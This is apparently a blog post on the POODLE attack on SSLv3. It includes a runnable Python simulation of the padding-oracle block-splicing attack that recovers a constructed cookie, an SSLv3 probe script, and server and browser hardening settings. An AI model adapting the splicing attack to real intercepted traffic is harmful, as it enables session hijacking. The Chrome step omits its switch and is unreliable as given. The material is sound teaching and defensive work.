SSLv3 POODLE vulnerability - like BEAST, only easier

    As you may know, a padding-oracle attack on SSLv3 has been published (POODLE). An attacker who can get the victim's client to send data of his choosing to the server over SSLv3 can decrypt one byte of the plaintext per 256 requests on average. The root cause is that SSLv3 pads after computing the MAC: the padding bytes are not covered by the MAC, and the receiver checks only the last (length) byte, never the padding content itself.

    In principle the attack applies to any protocol in which the attacker can influence the data the attacked side sends. The easiest setting is a browser: to steal a cookie for an HTTPS site, the attacker injects his script into a plain-HTTP page the victim visits; that script makes requests to the HTTPS site with attacker-chosen path and body lengths (the browser attaches the cookie automatically), and the attacker, sitting on the network path, swaps ciphertext blocks inside those records.

    In any case, the attacker needs to:
    • be able to intercept and modify the victim's traffic (an active man-in-the-middle position)
    • be able to make requests on behalf of the victim that contain attacker-known plaintext

    The vulnerability is not specific to any implementation: it is a design flaw of SSLv3 itself. Although only CBC-mode cipher suites are affected (stream-cipher suites have no padding), the right fix is to disable SSLv3 entirely. SSL's time has passed.
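    The following is an added, self-contained example, not code from the original post: a simulation of the SSLv3 record layer (MAC-then-pad-then-encrypt, with only the final length byte checked) and the POODLE block-splicing attack run against it. It uses a toy HMAC-based Feistel block cipher in place of AES/3DES so that it runs on the Python standard library alone; the attack does not depend on the cipher, only on CBC and the unchecked padding. The cookie, the key, and the victim_request/server_accepts functions are constructed stand-ins for the victim's browser and the server.

```python
import hashlib
import hmac
import os

BLOCK = 16    # block size of the toy cipher (AES-sized; 3DES in SSLv3 uses 8)
MAC_LEN = 20  # SSLv3 uses a 20-byte SHA-1 based MAC


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _feistel(key, block, rounds):
    # Toy 16-byte Feistel block cipher with an HMAC round function. It stands in for
    # AES/3DES only so this file runs on the standard library; POODLE is cipher-agnostic.
    left, right = block[:8], block[8:]
    for r in rounds:
        f = hmac.new(key, bytes([r]) + right, hashlib.sha256).digest()[:8]
        left, right = right, xor(left, f)
    return right + left


def block_encrypt(key, block):
    return _feistel(key, block, range(8))


def block_decrypt(key, block):
    return _feistel(key, block, reversed(range(8)))


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)


def ssl3_seal(key, data):
    # SSLv3 record body: data || MAC(data) || padding || pad_len. The MAC covers only
    # data, and the padding bytes are arbitrary: the receiver looks only at pad_len.
    mac = hmac.new(key, data, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(data) + MAC_LEN + 1) % BLOCK) % BLOCK
    padding = os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, data + mac + padding)


def ssl3_open(key, record):
    """Receiver side: returns the data, or None on a padding/MAC error (the oracle)."""
    pt = cbc_decrypt(key, record[:BLOCK], record[BLOCK:])
    pad_len = pt[-1]
    if pad_len >= BLOCK or len(pt) < pad_len + 1 + MAC_LEN:
        return None
    body = pt[:-(pad_len + 1)]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(mac, hmac.new(key, data, hashlib.sha1).digest()):
        return None
    return data


SECRET = b"sid=c0ffee1337"  # constructed cookie; the victim's browser sends it in every request
KEY = os.urandom(32)        # session key shared by victim and server, unknown to the attacker


def victim_request(prefix_len, suffix_len):
    """Attacker-controlled script makes the browser send a request whose path/body lengths it picks."""
    return ssl3_seal(KEY, b"A" * prefix_len + SECRET + b"B" * suffix_len)


def server_accepts(record):
    return ssl3_open(KEY, record) is not None


def poodle_recover(secret_len, max_tries=20000):
    recovered, tries = bytearray(), 0
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK                         # secret[j] lands on a block's last byte
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK  # data+MAC fill whole blocks: last block is pure padding
        target = (prefix_len + j) // BLOCK                           # plaintext block index holding secret[j]
        for _ in range(max_tries):
            rec = victim_request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
            blocks[-1] = blocks[target + 1]                          # splice the target block over the padding block
            tries += 1
            if server_accepts(b"".join(blocks)):
                # Accepted means the decrypted last byte equals BLOCK-1, so
                # P_target[-1] = (BLOCK-1) XOR C_{target-1}[-1] XOR C_{n-1}[-1].
                recovered.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check alignment")
    return bytes(recovered), tries


if __name__ == "__main__":
    got, n = poodle_recover(len(SECRET))
    print(got, "recovered in", n, "requests (~%d per byte)" % (n // len(SECRET)))
```

    Each accepted splice reveals one byte because the spliced block decrypts to P_target XOR C_{target-1} XOR C_{n-1}, and the server accepts exactly when its last byte equals the expected padding length. A TLS 1.0+ receiver, which checks every padding byte, rejects the spliced record regardless of that last byte, which is why the attack stops at SSLv3.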

    How to protect yourself?

    Disable SSLv3 on both clients and servers.

    In Firefox < 34 you need to either install the addon, or set
    about:config → security.tls.version.min = 1
    (in Firefox 34 and later SSLv3 is disabled by default)

    In Chrome, add
    as a command-line switch at startup.

    In Internet Explorer, uncheck "Use SSL 3.0" under Internet Options → Advanced.

    For nginx :
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

    For Apache :
    SSLProtocol All -SSLv2 -SSLv3

    For IIS (Schannel): set the DWORD Enabled to 0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server and reboot.
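    To verify that a server really stopped accepting SSLv3 after such a change, here is an added example that is not part of the original post: a minimal SSLv3 ClientHello sender and a parser for the server's first record (ServerHello means SSLv3 was accepted; an alert or a closed connection means it was refused). It also reports whether the negotiated suite is CBC, since only CBC suites are POODLE-exposed. The cipher-suite numbers are the standard SSLv3/TLS values; the sample responses are constructed so the parser can be exercised offline, and probe() is the only part that touches the network.

```python
import os
import socket
import struct

SSLV3 = b"\x03\x00"
SUITE_NAMES = {
    0x0005: "SSL_RSA_WITH_RC4_128_SHA",       # stream cipher: no padding, not POODLE-exposed
    0x000A: "SSL_RSA_WITH_3DES_EDE_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
}
CBC_SUITES = {0x000A, 0x002F, 0x0035}


def build_sslv3_client_hello(suites, client_random=None):
    """Record(handshake, 3.0) wrapping Handshake(client_hello) with the given suites and null compression."""
    client_random = client_random or os.urandom(32)
    suite_bytes = b"".join(struct.pack("!H", s) for s in suites)
    body = (SSLV3 + client_random + b"\x00"                       # version, random, empty session id
            + struct.pack("!H", len(suite_bytes)) + suite_bytes   # cipher_suites
            + b"\x01\x00")                                        # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body     # HandshakeType client_hello(1)
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake  # ContentType handshake(22)


def classify_server_response(data):
    """Interpret the first record the server sent back to our SSLv3 ClientHello."""
    result = {"sslv3": False, "cbc": False, "detail": ""}
    if len(data) < 5:
        result["detail"] = "no or truncated response (server closed the connection)"
        return result
    ctype, _major, _minor, length = struct.unpack("!BBBH", data[:5])
    body = data[5:5 + length]
    if ctype == 0x15 and len(body) >= 2:                  # alert(21): SSLv3 refused
        result["detail"] = "alert level=%d description=%d" % (body[0], body[1])
    elif ctype == 0x16 and body[:1] == b"\x02":           # handshake(22) / server_hello(2)
        sh = body[4:4 + int.from_bytes(body[1:4], "big")]
        sid_len = sh[34]                                  # version(2) random(32) session_id_len(1)
        suite = struct.unpack("!H", sh[35 + sid_len:37 + sid_len])[0]
        if sh[:2] == SSLV3:
            result["sslv3"] = True
            result["cbc"] = suite in CBC_SUITES
            result["detail"] = "SSLv3 ServerHello, suite %s" % SUITE_NAMES.get(suite, hex(suite))
        else:
            result["detail"] = "ServerHello with version %s, not SSLv3" % sh[:2].hex()
    else:
        result["detail"] = "unexpected record type %d" % ctype
    return result


def probe(host, port=443, timeout=5.0, suites=tuple(SUITE_NAMES)):
    """Live check: offer only the given suites over SSLv3 and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_sslv3_client_hello(list(suites)))
        try:
            data = s.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return classify_server_response(data)


def _server_hello_record(version, suite):
    """Constructed ServerHello record (zeroed random, empty session id) for offline use."""
    sh = version + b"\x00" * 32 + b"\x00" + struct.pack("!H", suite) + b"\x00"
    hs = b"\x02" + len(sh).to_bytes(3, "big") + sh
    return b"\x16" + version + struct.pack("!H", len(hs)) + hs


SAMPLE_VULNERABLE = _server_hello_record(SSLV3, 0x002F)  # SSLv3 + AES-CBC: POODLE-exposed
SAMPLE_RC4 = _server_hello_record(SSLV3, 0x0005)         # SSLv3 accepted, but a stream cipher
SAMPLE_REFUSED = b"\x15\x03\x00\x00\x02\x02\x46"         # fatal(2) protocol_version(70) alert

if __name__ == "__main__":
    for name, sample in [("vulnerable", SAMPLE_VULNERABLE), ("rc4", SAMPLE_RC4), ("refused", SAMPLE_REFUSED)]:
        print(name, classify_server_response(sample))
```

    A server configured as above (TLS only) answers the SSLv3 ClientHello with an alert or simply closes the connection; "sslv3": True together with "cbc": True is the POODLE-exposed case. Passing suites=CBC_SUITES to probe() asks the narrower question of whether the server will still negotiate a CBC suite under SSLv3.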

    References:
    • checking servers
    • checking browsers
    • Whitepaper
    • Announcement of disabling SSLv3 on Cloudflare by default
    • Announcement from Google
    • Details on the attack
    • Detailed description of the attack
